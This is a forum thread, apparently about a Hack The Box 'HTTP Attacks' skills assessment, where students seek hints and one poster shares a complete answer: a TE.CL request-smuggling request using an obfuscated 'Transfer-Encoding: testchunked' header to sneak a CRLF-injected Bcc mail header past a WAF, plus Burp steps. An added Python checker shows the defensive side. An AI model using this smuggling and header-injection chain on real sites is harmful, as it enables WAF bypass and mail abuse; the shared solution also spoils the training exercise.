HTTP Attacks - Skills Assessment

Need some help with the HTTP Attacks - Skills Assessment. After massive headaches, I finally believe I have the proper attack chain – I’m submitting my POST request (with malicious content), NOT getting a WAF error, AM getting a seemingly proper return (just as if I were to submit content which was NOT malicious)… but NOT getting the email… Please help. Thx.

EDIT: Solved. SWEAR I had tried the solution before, but clearly did something wrong as a clear-mind managed to get it.

I tried everything I can think of, but no result. If you still have the solution, can you share it?

Finally worked! Same here, I feel I tried the solution before but it didn’t work.

Seems like I’m stuck at the same point. Tried different payloads, think everything’s correct. I can bypass the WAF while sending a malicious payload, but don’t get any email. How did you guys take that exercise?

If anyone can give some pointers here I’d appreciate it!
I was able to perform the TE.CL via TE.TE but still get picked up by the blacklisted characters. Don’t know if I have to double URL encode it or am going down a rabbit hole.

Yes, tried the same. No email though.
If I am correct, the lab should be fairly easy. The hint is giving too much info. It’s a shame I am still not able to solve it.
Edit: Completed :star_struck:

Could somebody explain to me what the principle of building the payload should be? I think I’ve bypassed the WAF, but I can’t receive the email.

URL encoding the CRLF characters is not needed. Instead, look at the coverage of the WAF, where it is not present. Look for a weakness in the WAF.

Hi all, I can bypass the WAF, but I cannot see anything on /mail. Any hint on how to proceed? Thanks

Hi all, I suppose that I should try to access any internal endpoint protected by the WAF, but I can’t find which one. Any hint? Thanks a lot

Hi @TheRealPatrick, I am stuck at the same point you were before you solved it. Any hint to proceed? Thanks a lot

*Just solved. Thanks anyway.

Hi @ju7LSOw, do you still remember how to solve this?
I can smuggle the HTTP POST request through TE.CL but still cannot get any mail.
I suspect the CRLF characters have been tampered with by the WAF, but I have no idea how I can bypass it.
Could you please give some hints? Thanks

Hi,

POST /doesnotexist HTTP/1.1
Host: 94.237.53.117:43804
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://94.237.53.117:43804
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.53.117:43804/contact
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Content-Length: 4
Transfer-Encoding: testchunked

d5
POST /contact HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

name=hacker%0d%0aBcc:%[email protected]%0d%0aDummy:%20abc&email=attacker%40evil.htb&message=ciao

0

and

GET /doesnotexist HTTP/1.1
Host: 94.237.53.117:43804
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.53.117:43804/contact
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

combined together…

1 Like
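From the defender's side, the two things the requests above depend on are a front end and back end disagreeing on how the body is framed (a Content-Length next to a Transfer-Encoding value that is not plain chunked) and a form field that decodes to CR/LF and is later copied into a mail header. The checker below, an added example that is not code from the lab, from HTB, or from any poster in this thread, rejects both conditions at a proxy before anything is forwarded. The host name, the sample requests and the set of accepted transfer codings are constructed assumptions for illustration.

```python
"""Strict request-head checker for an HTTP/1.1 reverse proxy or WAF.

Added example, not code from the lab or from any poster in the thread.
It refuses the framing ambiguity the smuggled requests rely on
(Content-Length beside an unrecognised Transfer-Encoding value) and flags
CRLF sequences inside urlencoded form fields that an application might
copy into a mail header. Host names and sample requests are constructed.
"""
import re
from urllib.parse import parse_qs

# RFC 9110 token characters for the header name; value is the rest after ':'.
HEADER_RE = re.compile(rb"^([!#$%&'*+.^_`|~0-9A-Za-z-]+):[ \t]*(.*?)[ \t]*$")

# Transfer codings a compliant HTTP/1.1 server is expected to understand.
KNOWN_CODINGS = {"chunked", "gzip", "deflate", "compress"}

# Constructed sample mirroring the ambiguity in the thread: an obfuscated
# Transfer-Encoding value next to a Content-Length. Body is a placeholder.
SAMPLE_SMUGGLE = (
    b"POST /doesnotexist HTTP/1.1\r\n"
    b"Host: example.internal\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 4\r\n"
    b"Transfer-Encoding: testchunked\r\n"
    b"\r\n"
    b"0\r\n\r\n"
)

# Constructed sample: well-framed, but the 'name' field decodes to CRLF
# followed by an extra header line.
SAMPLE_CRLF = (
    b"POST /contact HTTP/1.1\r\n"
    b"Host: example.internal\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 50\r\n"
    b"\r\n"
    b"name=x%0d%0aX-Test:%20y&email=a%40b.htb&message=hi"
)

# Constructed sample: an ordinary contact-form submission.
SAMPLE_CLEAN = (
    b"POST /contact HTTP/1.1\r\n"
    b"Host: example.internal\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 37\r\n"
    b"\r\n"
    b"name=alice&email=a%40b.htb&message=hi"
)


def parse_head(raw: bytes):
    """Split a raw request into (request_line, [(name, value)], body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete request head")
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        m = HEADER_RE.match(line)
        if not m:
            raise ValueError(f"malformed header line: {line!r}")
        headers.append((m.group(1).decode("ascii").lower(),
                        m.group(2).decode("latin-1")))
    return lines[0].decode("ascii"), headers, body


def check_framing(headers):
    """Return reasons to refuse the request, following RFC 9112 section 6."""
    problems = []
    te = [v for k, v in headers if k == "transfer-encoding"]
    cl = [v for k, v in headers if k == "content-length"]
    if te and cl:
        # Two hops may pick different headers to delimit the body.
        problems.append("both Transfer-Encoding and Content-Length present")
    if len(set(cl)) > 1:
        problems.append("conflicting Content-Length values")
    for v in cl:
        if not re.fullmatch(r"[0-9]+", v):
            problems.append(f"non-numeric Content-Length {v!r}")
    for v in te:
        codings = [c.strip().lower() for c in v.split(",") if c.strip()]
        unknown = [c for c in codings if c not in KNOWN_CODINGS]
        if unknown:
            # e.g. 'testchunked': refuse rather than guess what a lenient
            # back end would make of it.
            problems.append(f"unrecognised transfer coding {unknown[0]!r}")
        elif codings[-1] != "chunked":
            problems.append("chunked is not the final transfer coding")
    return problems


def check_form_fields(body: bytes):
    """Names of urlencoded fields whose decoded value contains CR or LF."""
    fields = parse_qs(body.decode("latin-1"), keep_blank_values=True)
    return sorted(name for name, values in fields.items()
                  if any("\r" in v or "\n" in v for v in values))


def inspect_request(raw: bytes) -> dict:
    """Decide whether a proxy should forward or reject the request."""
    request_line, headers, body = parse_head(raw)
    framing = check_framing(headers)
    is_form = any(k == "content-type" and
                  v.lower().startswith("application/x-www-form-urlencoded")
                  for k, v in headers)
    injected = check_form_fields(body) if is_form else []
    return {"request_line": request_line, "framing": framing,
            "header_injection": injected,
            "verdict": "reject" if framing or injected else "forward"}


if __name__ == "__main__":
    for label, raw in (("smuggle", SAMPLE_SMUGGLE), ("crlf", SAMPLE_CRLF),
                       ("clean", SAMPLE_CLEAN)):
        print(label, inspect_request(raw))
```

The check is deliberately strict: a request carrying both framing headers, or a transfer coding the proxy does not recognise, is refused outright instead of being normalised, because normalising is exactly where a front end and back end start to disagree. The CRLF check runs on the value after one round of URL decoding, which is what the application sees; if the application decodes a second time, the same check has to be repeated at that layer.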

Thank you very much! I guess I didn’t try hard enough…
Finally completed this assessment.

I tried the option from ‘ju7LSOw’ but it did not work. I was able to do TE.TE but not TE.CL over TE.TE. Can someone help me to complete this?

For TE.CL to work, you need to modify the Content-Length. Make sure you perform the following steps in Burp (refer to the TE.CL section for more details):

  1. disable the auto content-length update
  2. create tab group
  3. send request in a single connection

Also, make sure the GET request has 2 blank lines at the end (i.e. 2 blank lines after the 0).

Did that already and I have sent you a PM.

Also, I cannot save a post with embedded media like screenshots.